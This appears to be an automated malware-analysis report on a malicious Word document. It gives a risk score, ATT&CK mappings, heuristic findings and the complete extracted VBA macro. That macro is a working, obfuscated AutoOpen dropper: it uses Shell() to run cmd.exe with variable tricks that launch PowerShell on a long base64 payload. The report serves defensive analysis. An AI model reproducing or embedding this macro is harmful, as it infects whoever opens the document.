MALICIOUS
150
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The sample is a malicious Office document containing VBA macros. The Autoopen macro triggers a call to Shell(), which is used to execute a command. The script attempts to construct a command string that includes encoded arguments for 'cmd.exe /V /c', suggesting it's designed to download and execute a secondary payload. The specific command construction is obfuscated but appears to be a common technique for malware droppers.
Heuristics 6
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBAMatched line in script
IEEjn = Cos(uTvXP) SljzT = zthjv + Shell(fiZTEZv + Chr(rzYFINWIdU + vbKeyC + blFapLaXU) + aQvPhPoDb + MdBoYR + jiOWRod + ZXjoBL + zEjHZHRNrbA, 70128 - 70128) izkGjK = Hex(ooYjYO + Hex(bzfKo) * 48128 + Round(YMHzvZ)) -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
End Function Sub Autoopen() On Error Resume Next -
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 10046 bytes |
SHA-256: 1710601405cb55628b4f25d401efb201960ca66a5ccd8250b06cfbfd37584470 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "wKjjNDCSzIPZR" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Function SljzT() On Error Resume Next TYZuF = Hex(rdzJFf + Hex(UPSiLs) * 68661 + Round(nBowUm)) nzSiYE = Cos(vrpmi) cVEimz = CDate(MNIfH) IjWkv = Cos(owpArb) kzTap = Hex(JsRSw + Hex(MXTja) * 83910 + Round(WXwpZG)) ButnVM = Cos(fNUsm) FwIrN = CDate(biNVR) IEEjn = Cos(uTvXP) SljzT = zthjv + Shell(fiZTEZv + Chr(rzYFINWIdU + vbKeyC + blFapLaXU) + aQvPhPoDb + MdBoYR + jiOWRod + ZXjoBL + zEjHZHRNrbA, 70128 - 70128) izkGjK = Hex(ooYjYO + Hex(bzfKo) * 48128 + Round(YMHzvZ)) wSXij = Cos(NQpUC) WdajY = CDate(Uifuok) qWFkcH = Cos(klpVAw) End Function Sub Autoopen() On Error Resume Next ErLJLI = Hex(CzzcjT + Hex(qhDinz) * 86595 + Round(HjNNQR)) nEjZqQ = Cos(Ukcbwn) HHsoK = CDate(EmrNzw) kiwzr = Cos(SMttK) SljzT KzMSBL = Hex(FQAYU + Hex(GXfAN) * 41472 + Round(uzGqo)) kcVLOO = Cos(LzusUp) wqAkF = CDate(YlwmLf) khLtV = Cos(WbakFl) End Sub Attribute VB_Name = "mNGdnjYT" Function aQvPhPoDb() On Error Resume Next znUdCo = Hex(cVAZN + Hex(fkOtD) * 65864 + Round(XZEZaU)) CPEwA = Cos(UBCBVo) pKoXZh = CDate(RLSfY) SVYiu = Cos(hXRMQ) whiWX = "md nTw" + "zpWzaWd" + "Dw i" + "pEzAQ" + "bi" + "MzWzBBkCP AR" ZfAih = Hex(YOmAN + Hex(hAtRAr) * 95221 + Round(aoOwd)) HSGYY = Cos(XVzBCn) GGJZRH = CDate(BuJPXZ) rblQB = Cos(NEGHO) wCYSzhDfuVS = "jYYtlS &" + " %^c^o^m" + "^S^p^E^c^" + "% %^c^o^m" + "^S^p^E^c^% " + " /V " QOLArO = Hex(OrSQO + Hex(rqTMJr) * 1907 + Round(iftOlB)) PBACKp = Cos(YptSAK) XYLWT = CDate(KuszQ) dhiRm = Cos(MawpS) EMDjPu = " " + "/c " + " set %qslm" + "vWdDzJjzpf" + "F%=VsdsUwpUNvv" + "&&set " + "%HGnuERbpk" + "l%=p&&s" EHASd = Hex(qqqnL + Hex(irRsb) * 40710 + Round(DlwLJ)) XGMnjM = Cos(GzSLIs) YGZXq = CDate(bjvoU) djOcHw = Cos(cFMiCH) wiokaTr = "et %VFWpEGpZZl" + "ARO%=o^w&&set" + " %HzQfGO" + "zlmaLJzUw%" + "=aV" + "QRVMI&&set %IPX" + "iqToY%=!%HG" + "nuERbpkl%!&&s" dAlYFj = Hex(EkzLZV + Hex(NoLYTk) * 67940 + Round(rULPR)) LLcXP = Cos(sbwWi) PZvRQh = CDate(DPRBGj) rcIQN = Cos(STsZUo) pcNWwkhlY = "et %" + "DjQswuCRYzbVDhi" + "%=k" + "stSzKjd" + "YVs&&set %VnCTC" + "Uo" + "uN%=e^r&&se" + "t %KXhHjAp" + "pJmZ%" + "=!%V" Gvlpo = Hex(iUKFZD + Hex(oOAuKV) * 76710 + Round(XPThJs)) wjWwc = Cos(UHdbM) AChXi = CDate(jCDTw) zAQij = Cos(IfzQY) cpkdV = "FWpEGpZZlARO%!&" + "&set %" + "hpjKi" + "Gwb%=s&&set " + "%Owwia" + "vqNwpWwqjJ" + "%=" + "JYzuXwv" idbFTH = Hex(SwFnq + Hex(slUZqO) * 55193 + Round(IzbHmb)) TjTkd = Cos(oFlii) wfQtNZ = CDate(ojnGHB) vafzzh = Cos(LzRmDN) ZPVmc = "jZbuJ&&se" + "t %DrojVTM" + "iiIoGp%=he&&" + "set %fi" + "dY" + "WiQwar%=ll&&!" DjjvHS = Hex(CsDOit + Hex(ijaLii) * 16971 + Round(ZmhAP)) jwHKMF = Cos(AEKziP) hbkPot = CDate(TqaUfd) GwOHDv = Cos(twEVn) cLDWMEXjrpG = "%IPXiqToY%!!" + "%KXhHjAppJm" + "Z%!!%Vn" + "CTCUouN%!" + "!%hpjKiGwb%!!%D" + "rojVTMiiI" + "oGp%" + "!!%" + "fi" icPMz = Hex(QjwCR + Hex(WENHh) * 79329 + Round(cvtHwr)) UWofft = Cos(rCqbO) MNHHu = CDate(vhrJmO) oLGkU = Cos(UTwts) HwtwCz = "dYWiQwar%!" + " -e KABuA" + "EUAdwAtAG" + "8AQgBqAGUAQ" + "wB0ACAAU" + "wBZAFMAd" + "ABFAG" + "0A" + "LgB" + "JAG8AL" WXLiB = Hex(jTTUP + Hex(mNAwwd) * 25497 + Round(QQFok)) WItBO = Cos(PoXYj) pmGvv = CDate(wSwHS) VVjrD = Cos(RXuiA) XKCFaHbuIbk = "gBjAE8ATQBwA" + "FIARQB" + "TAHMAS" + "QBPA" aQvPhPoDb = whiWX + wCYSzhDfuVS + EMDjPu + wiokaTr + pcNWwkhlY + cpkdV + ZPVmc + cLDWMEXjrpG + HwtwCz + XKCFaHbuIbk End Function Function MdBoYR() On Error Resume Next ZSGvY = Hex(qbMwna + Hex(UUmsSU) * 28923 + Round(VjtnYl)) GMIGm = Cos(WdMBtA) qLYiG = CDate(ilffbO) hDlNIA = Cos(ZUAoj) pWQIYs = "E4AL" + "gBkAEUAR" + "gBMAEEAVABlAF" + "MAdABSAGUA" + "YQBtACgAWwB" + "zAFkAUw" + "BU" + "AE" + "UAbQAuAEkAbwA" NwrarY = Hex(zzKHL + Hex(cDfbhj) * 85179 + Round(ASrws)) osVLkB = Cos(hjuEo) vnhsi = CDate(bYItt) HnmMj = Cos(bwfiF) wfNfMK = "uAE0AZQBtAE8AU" + "gB5AF" + "MAdAByAGUA" + "YQBtA" + "F0AIABbAEMA" + "bwBO" + "AFYARQByAFQ" + "AXQA6ADoAZgB" zXJOuU = Hex(XtdzOT + Hex(MwRVj) * 96715 + Round(scOjVD)) dpXQhD = Cos(GtMdoI) ZiqXt = CDate(nijKw) CHvvi = Cos(RruDG) QvzXwAuT = "SA" + "E8AbQBiAGEAUwB" + "lADYA" + "NABTAFQAcg" + "BpAG" + "4AZwAoACcAVgB" + "WAEIAZABTADgAT" + "gBBAEUAUAB" + "3AHIAOQAzAEMAUQ" + "BCAEoA" hPjGDF = Hex(spGSwX + Hex(bwGwI) * 24188 + Round(ZAmLw)) DXRbWY = Cos(qdahb) SGRvpz = CDate(awUlw) tOHPuu = Cos(boUYi) hALRKVfp = "cwBMAEkAaA" + "BiAGEAUQA2A" + "Go" + "AWQBGA" + "GgAKwBNA" + "EYATgBMA" + "DYAaABTAE" + "MAWAB" + "5A" MdBoYR = pWQIYs + wfNfMK + QvzXwAuT + hALRKVfp End Function Function jiOWRod() On Error Resume Next ZNRzWY = Hex(htLHE + Hex(OaDECf) * 60543 + Round(iwjOfm)) AiltQ = Cos(XKIBzM) NACzK = CDate(jfXjSs) TvQiiq = Cos(AjOaOn) aUXVlPRZP = "DUA" + "cQBjAFQAZQA3AEM" + "AWgBmAHQ" + "ARgB5AEgALw" + "AzAE4ASwBuAGcAe" + "QA4AEwAdQB" + "6AE8AegBNAEw" + "AaQAyADIAa" + "QA3AGYAN" + "wBGADMASgBEAE" rPuDE = Hex(GOitj + Hex(iFqcv) * 36406 + Round(RabtZ)) HaYjl = Cos(lWupPd) NZtFQX = CDate(iHjJET) NWcPV = Cos(kzthh) XIcwT = "4AQgB" + "4AEMAawAzA" + "DYAQgBSAEcASw" + "BGAHoAaw" + "B6AEYANgBX" SzhoQb = Hex(PFbYVL + Hex(aoztO) * 55448 + Round(TYARZ)) IvQjLX = Cos(ECwTP) EDClzH = CDate(zuvzz) EbwYh = Cos(qhqUo) iIitijbGIW = "ADYAWgByAHU" + "AeAAvAEs" + "ARA" + "BrADEAQwB" + "CAFYANwBCAEcAVA" + "BQAGsATgA2" + "AFYAQwBqAFIAeQB" + "hAHAALwBxAFIAag" + "BxAGkAVgB5AE" + "QAV" MznRXs = Hex(djXORm + Hex(KWuNz) * 36724 + Round(tTvGdO)) YANiOq = Cos(JPhWDR) mjNhm = CDate(MUndVV) TisLu = Cos(iFfKfD) iDMcp = "wAwAHkAa" + "QBxAG8A" + "VQBHAFYARwA4" + "ADIASwBYAF" + "oAUQBMAEIAQQB" + "aAEg" + "AbQBBADMAWQ" + "BYAHAAU" + "gBn" + "AFYAVABWA" QAGMrv = Hex(KGmiZ + Hex(jlENkN) * 85595 + Round(RfXWcZ)) QHWhiq = Cos(LOama) DNrJl = CDate(uzBRZ) KTwUi = Cos(OVSuzP) FZEih = "GgAMABsAFIAL" + "wBvAE0AZQB" + "TAHU" + "AbABU" + "AG8AZQB6AE0AdgA" + "0AFAAVA" + "BoAG" + "QAYgAyAF" uAUZp = Hex(wmYYEn + Hex(kZflP) * 80185 + Round(PTXPrj)) XEBJNb = Cos(rCaYL) afmuuj = CDate(Fpphi) SlbdE = Cos(ICbhXP) sKEcwzRqin = "oAdQAzAFcAMA" + "BEADgAYwAwAE" + "gATgBHAC8AS" + "ABKAEgAeAA5A" + "FcAU" + "gA4AE4A" + "WABHAEUASwB" + "zADUAcwBqAEQAOA" + "BNADAA" LEtXFN = Hex(LWjhc + Hex(KLfiO) * 38806 + Round(EJXPYV)) CbzzOi = Cos(UPLSk) awwBu = CDate(iXwXs) ClmCj = Cos(wjXBjW) RtThzt = "UAB1AHAAQwAxAFM" + "AVABD" + "ACsASwA" + "5AGU" SzSpwT = Hex(iADGN + Hex(VYmRF) * 8293 + Round(iLtQS)) hUAwZO = Cos(QbCPi) DdoCh = CDate(pKIazF) fQGGEC = Cos(MmvdD) dPamZia = "ANgA0AE8AWQB0AG" + "YAKwA3AHUAV" + "wBmAHgAbwB" + "LAFEAaABV" roFtVW = Hex(EAdqJL + Hex(cYZuDq) * 58310 + Round(IJVwNL)) RhKwDp = Cos(FOEaW) imQzsT = CDate(oMBaNz) fvYWJ = Cos(QivfK) NRQMquFflW = "ADgA" + "VA" + "BJ" + "ADkAWABxAG" + "wAaQBoAE4AK" ubTKp = Hex(UnEWtY + Hex(uQzEj) * 68901 + Round(EjVJpi)) wZvqk = Cos(kYSVCM) sLEICA = CDate(PHRiP) ZENFJU = Cos(MWNIf) Gtojlzjw = "wByAGgAQg" + "BpAC" + "8AYgBVADkAag" + "BlAHkAdQBUAG4A" + "bwAwAG8AaABzA" + "HEA" + "VQBvAD" + "QAVQA5AG4AYQBK" + "AEcAaQBWA" + "HoAdgAxAGc" jiOWRod = aUXVlPRZP + XIcwT + iIitijbGIW + iDMcp + FZEih + sKEcwzRqin + RtThzt + dPamZia + NRQMquFflW + Gtojlzjw End Function Function ZXjoBL() On Error Resume Next lVVzd = Hex(Tmssc + Hex(GpRBq) * 16443 + Round(boNjL)) LhFlW = Cos(vdtPvt) nbwKj = CDate(ksCfp) fFqEU = Cos(pJkSU) mPbtAhc = "AUgBBAG" + "IATABnAE" + "MAYwB" + "vA" + "EwASQBZ" + "AHIAYQB5AFE" + "AMAB" + "6AFgAb" AWujj = Hex(aWHhV + Hex(fihUaU) * 16831 + Round(ParsF)) YrFkY = Cos(HhJKR) JpFTD = CDate(kAZqqV) QJRwZf = Cos(bKoiQ) UtWbnU = "gBNAFUAMgBlAHkA" + "NQBaADAAVQBLA" + "EkAdgAyAFkAQg" + "BWAEMAVwBKAG" + "cARw" + "BDAGYAMQBnA" + "GkANgBP" + "AEUARwBwAFYAN" + "wBSAHUAdwBVAEk" IAizU = Hex(CWLTz + Hex(XsIEzi) * 965 + Round(AHLqik)) PcwAWC = Cos(pkScVT) MFqUD = CDate(mtWKG) jWAosO = Cos(rmuMSb) pRRrF = "AZwBmAGUA" + "ZABkADgAPQA" + "nACAAKQAsACAA" + "WwBzAF" + "kAUw" + "BUAGUATQAuAEk" + "Abw" + "AuAE" + "MAbwBNAFA" + "AU" rDYmXM = Hex(QoCVWf + Hex(tWFotn) * 42153 + Round(ovZNl)) jSsXsK = Cos(jVjmu) QiwTW = CDate(CwQoYY) WiOcNK = Cos(EkWJzd) BstFCGhPM = "gBlAF" + "MAUwBpAE8A" + "bgAuAGMAb" + "wBtAHAAUgBl" + "AHMAcwBJ" + "AG8ATgB" + "NAG8ARABlA" + "F0AOgA6AEQAZQBD" + "AE8ATQBQAFI" YJAWB = Hex(mFaqcD + Hex(idPdUw) * 10311 + Round(bUsWcT)) fMoVsM = Cos(oPRWZB) HXAJi = CDate(bUsozX) wpIzYj = Cos(ZOCGKS) wIJrjnfBEB = "AZQBzAFMAKQ" + "B8AEYAbwBSA" + "EUAYQ" + "BDAGgAewAgAG4A" + "RQB3AC0AbwBCAGo" + "AZQBDAHQAIA" + "Bp" + "AG8ALgBzAHQAc" oALwZ = Hex(VTzrN + Hex(aVLTzW) * 40507 + Round(hzHSzs)) rsVuw = Cos(omUjq) TMcsQ = CDate(bGTOuC) poWpst = Cos(jsdbb) fawVXVBIBa = "gBFAGEATQBSAG" + "UAQQBEAGUAUg" + "AoACAAJABfACAAL" + "AB" + "bAFQARQB4" + "AH" + "QALgB" + "FAG4AQwBPAEQ" Okmjqn = Hex(wBRFH + Hex(fWmsdw) * 36554 + Round(JYRzb)) ptbiBQ = Cos(XqTkX) snoWR = CDate(CNitzA) InFMUl = Cos(AUDZi) RnpMap = "ASQB" + "OAEcAXQA6ADo" + "AQQBTA" + "EMASQ" + "BpACkAIAB9" + "AHwA" + "IABmAE8AcgBlA" + "EEAQwBIACAAewA" + "kAF8ALgBSAE" + "UAQQBkAFQATwBFA" ZXjoBL = mPbtAhc + UtWbnU + pRRrF + BstFCGhPM + wIJrjnfBEB + fawVXVBIBa + RnpMap End Function Function zEjHZHRNrbA() On Error Resume Next qXHjT = Hex(GqaWU + Hex(zPZZK) * 99046 + Round(iYIfSd)) wIGYjO = Cos(OriFwa) tmiRkK = CDate(WpbJE) ziispC = Cos(JwkBm) jitpJziz = "G4AZAAoACkAf" + "QApACAA" + "fAAm" + "ACgAIAA" + "kAHYAR" + "QByAEIATwB" + "zAGUAUAByAE" NlYuT = Hex(ZlomZ + Hex(hTdcS) * 60211 + Round(fRojI)) QwGhvB = Cos(iiwjzu) zfMLs = CDate(iHiqj) EmHoZC = Cos(IDQSD) bWrMsbrXqb = "UARgBFAHIAZ" + "QBO" + "AGMA" + "ZQAuAF" + "QAbwBTAFQAUgB" + "JAE4ARwAoACkA" + "WwAxACwAMwB" + "dACs" ksjDXu = Hex(YXRAFc + Hex(zIINPB) * 31126 + Round(uXqWhi)) EhMJSH = Cos(uELwB) hVGiz = CDate(PzvCD) cnwLM = Cos(NwmTk) QDoRaakXsuG = "AJ" + "wB4AC" + "cALQBqA" + "E8ASQBuAC" + "cAJwApAA==" zEjHZHRNrbA = jitpJziz + bWrMsbrXqb + QDoRaakXsuG End Function |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.